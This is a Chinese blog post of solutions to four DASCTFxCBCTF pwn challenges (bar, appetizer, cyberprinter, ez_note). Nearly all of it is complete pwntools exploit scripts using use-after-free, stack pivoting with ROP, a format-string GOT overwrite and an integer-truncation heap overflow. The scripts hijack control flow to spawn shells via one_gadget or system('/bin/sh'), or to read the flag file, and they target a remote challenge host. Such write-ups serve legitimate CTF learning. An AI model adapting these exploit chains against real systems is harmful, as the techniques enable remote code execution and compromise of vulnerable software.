Leof's blog
0%

DASCTFxCBCTF-pwn

发表于 更新于 分类于

DASCTFxCBCTF pwn

bar

libc2.31 uaf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
from pwn import *
binary = "./bar"
elf = ELF(binary)
libc = ELF('./libc-2.31.so')
ip = 'node4.buuoj.cn'
port = 26032
local = 1
if local:
    io = process(binary)
else:
    io = remote(ip, port)

#context.log_level = "debug"

def debug():
    gdb.attach(io)
    pause()

s = lambda data : io.send(data)
sl = lambda data : io.sendline(data)
sa = lambda text, data : io.sendafter(text, data)
sla = lambda text, data : io.sendlineafter(text, data)
r = lambda : io.recv()
ru = lambda text : io.recvuntil(text)
uu32 = lambda : u32(io.recvuntil(b"\xff")[-4:].ljust(4, b'\x00'))
uu64 = lambda : u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
lg = lambda data : io.success('%s -> 0x%x' % (data, eval(data)))
ia = lambda : io.interactive()
_flags = 0xfbad1800

def menu(n):
    sla(b'Your choice:', str(n))

def add(mode, con = b'a'):
    menu(1)
    sla(b'Whisky , brandy or Vodka?', str(mode))
    sa(b'You may want to tell sth to the waiter:', con)

def delete(idx, size):
    menu(2)
    sla(b'Which?', str(idx))
    sla(b'How much?', str(size))

def show():
    menu(3)

show()
ru(b'We will give everyone only one cup of icecream!\n')
libcbase = int(io.recv(14), 16) - 0x1ec6a0
malloc_hook = libcbase + 0x1ebb70
lg('libcbase')
one = [0xe6aee, 0xe6af1, 0xe6af4]
ogg = libcbase + one[1]
'''
0xe6aee execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe6af1 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xe6af4 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL
'''

add(0)
add(0)
add(2)
add(2)
add(2)
add(0)
add(0)
add(0)
add(0)

delete(3, 0x40)
delete(2, 0x40)
delete(0, 0x100)
add(0, b'a' * 0xf8 + p64(0x421))
delete(1, 0x100)

add(1)
add(0, b'a' * 0x98 + p64(0x51) + p64(malloc_hook - 0x10))

add(2)
add(2, p64(ogg))
menu(1)
sla(b'Whisky , brandy or Vodka?', str(0))
ia()

appetizer

栈迁移

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
from pwn import *
binary = "./appetizer"
elf = ELF(binary)
libc = ELF('./libc-2.31.so')
#libc = elf.libc
ip = 'node4.buuoj.cn'
port = 25106
local = 0
if local:
    io = process(binary)
else:
    io = remote(ip, port)

context.log_level = "debug"

def debug():
    gdb.attach(io)
    pause()

s = lambda data : io.send(data)
sl = lambda data : io.sendline(data)
sa = lambda text, data : io.sendafter(text, data)
sla = lambda text, data : io.sendlineafter(text, data)
r = lambda : io.recv()
ru = lambda text : io.recvuntil(text)
uu32 = lambda : u32(io.recvuntil(b"\xff")[-4:].ljust(4, b'\x00'))
uu64 = lambda : u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
lg = lambda data : io.success('%s -> 0x%x' % (data, eval(data)))
ia = lambda : io.interactive()
_flags = 0xfbad1800

'''gdb.attach(io, 'b* $rebase(0x1372)')
pause()'''
sa(b"Let's check your identity", b'a' * 2 + p64(0x7373656c656d614e))
ru(b'Here you are:')
buf = int(io.recv(14), 16)
base = buf - 0x3050
base = base - 0x1000
end = base + 0x4050
lg('end')
lg('buf')
lg('base')


puts_got = base + 0x3fa0
puts_plt = base + 0x10B0
pop_rdi = base + 0x14d3
leave_ret = base + 0x12d8
start = base + 0x13D2
ret = base + 0x101a
read_again = base + 0x1428
pop_rbp = base + 0x11f3


payload1 = b'\x00' * 0x60 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt)
payload1 += p64(read_again)
sa(b'And pls write your own information on it', payload1)



payload2 = p64(buf + 0x60 - 8) + p64(leave_ret)
sa(b'Tell me your wish:', payload2)

libcbase = uu64() - libc.sym['puts']
lg('libcbase')
open_addr = libcbase + libc.sym['open']
read_addr = libcbase + libc.sym['read']
write_addr = libcbase + libc.sym['write']
pop_rsi = libcbase + 0x27529
pop_rdx_rbx = libcbase + 0x1626d6
#pop_rsi = libcbase + 0x2601f

payload3 = b'./flag' + b'\x00' * 2 + b'\x00' * 0x70 + p64(pop_rdi) + p64(buf) + p64(pop_rsi) + p64(0) + p64(open_addr)
payload3 += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(buf + 8) + p64(pop_rdx_rbx) + p64(0x30) + p64(0) + p64(read_addr)
payload3 += p64(pop_rdi) + p64(1) + p64(write_addr) 
s(payload3)
ia()

cyberprinter

格式化字符串,打puts调用链中的一个函数got表为ogg

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
from pwn import *
binary = "./cyberprinter"
elf = ELF(binary)
libc = elf.libc
ip = 'node4.buuoj.cn'
port = 28514
local = 0
if local:
    io = process(binary)
else:
    io = remote(ip, port)

context.log_level = "debug"
context(arch = 'amd64', os = 'linux')
def debug():
    gdb.attach(io)
    pause()

s = lambda data : io.send(data)
sl = lambda data : io.sendline(data)
sa = lambda text, data : io.sendafter(text, data)
sla = lambda text, data : io.sendlineafter(text, data)
r = lambda : io.recv()
ru = lambda text : io.recvuntil(text)
uu32 = lambda : u32(io.recvuntil(b"\xff")[-4:].ljust(4, b'\x00'))
uu64 = lambda : u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
lg = lambda data : io.success('%s -> 0x%x' % (data, eval(data)))
ia = lambda : io.interactive()
_flags = 0xfbad1800


sla(b'Your name?pls..', b'a' * 0x17)
libcbase = uu64() - 0x1ec5c0
lg('libcbase')

ABS_got = libcbase + 0x1eb0a8
one = libcbase + 0xe6af1

payload = fmtstr_payload(8, {ABS_got:one})

sa(b"But there is sth wrong in it,so you can't do sth", payload)

ia()

ez_note

输入size为long int 类型,判断size大小时强制类型转换成了int,由于long int 为8字节,int有4字节,所以转换后只保留低四字节内容,但是后面输入堆块内容时的size是输入的long int类型的,这里可以造成堆溢出,之后打堆重叠即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
from pwn import *
binary = "./pwn"
elf = ELF(binary)
libc = ELF('./libc-2.31.so')
ip = 'node4.buuoj.cn'
port = 27455
local = 0
if local:
    io = process(binary)
else:
    io = remote(ip, port)

#context.log_level = "debug"

def debug():
    gdb.attach(io)
    pause()

s = lambda data : io.send(data)
sl = lambda data : io.sendline(data)
sa = lambda text, data : io.sendafter(text, data)
sla = lambda text, data : io.sendlineafter(text, data)
r = lambda : io.recv()
ru = lambda text : io.recvuntil(text)
uu32 = lambda : u32(io.recvuntil(b"\xff")[-4:].ljust(4, b'\x00'))
uu64 = lambda : u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
lg = lambda data : io.success('%s -> 0x%x' % (data, eval(data)))
ia = lambda : io.interactive()
_flags = 0xfbad1800

def menu(n):
    sla(b'Your choice:', str(n))

def add(size, con = b'a'):
    menu(1)
    sa(b'Note size:', str(size))
    sa(b'Note content:', con)

def delete(idx):
    menu(2)
    sla(b'Note ID:', str(idx))

def show(idx):
    menu(3)
    sla(b'Note ID:', str(idx))

add(0x80)
add(0x200)  #1
add(0x200)  #2
add(0x200)   #3
add(0x200)

delete(0)
add(0x100000080, b'a' * 0x80 + p64(0) + p64(0x631))
delete(1)
add(0x200)  #1
show(2)
libcbase = uu64() - libc.sym['__malloc_hook'] - 0x10 - 96
lg('libcbase')
free_hook = libcbase + libc.sym['__free_hook']
sys_addr = libcbase + libc.sym['system']

delete(4)
delete(3)
add(0x220, b'a' * 0x200 + p64(0) + p64(211) + p64(free_hook))   #3
add(0x200, b'/bin/sh\x00')  #4
add(0x200, p64(sys_addr))
delete(4)
ia()